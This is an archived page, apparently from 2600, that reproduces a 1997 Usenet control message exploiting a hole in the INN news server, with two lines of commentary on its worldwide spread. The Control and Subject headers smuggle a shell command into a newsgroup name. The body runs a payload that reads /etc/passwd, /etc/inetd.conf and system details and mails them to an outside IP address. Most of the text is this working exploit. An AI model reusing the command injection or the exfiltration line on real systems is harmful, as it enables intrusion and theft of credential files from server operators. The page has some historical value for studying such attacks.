USENET Bug

Path: news.csd.net!newsjunkie.ans.net!newsfeeds.ans.net!sonybc!sonysjc!su-news-hub1.bbnplanet.com!news.bbnplanet.com!news.sgi.com!newsfeed.nacamar.de!nntp.uio.no!uninett.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n: '/^#+/,/^#-/p':${ARTICLE} | /bin/sh` moderated
Control: newgroup `/bin/sed:-n: '/^#+/,/^#-/p':${ARTICLE} | /bin/sh' moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9223@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s kalle root@[193.12.106.1]
#-

This USENET control message takes advantage of a rather large security hole in INN, a rather popular news server.

This very message went out to every news server in the world, and sent its booty to a very happy hacker in Sweden.

Admins, have you updated your INN???

Return to $2600 Index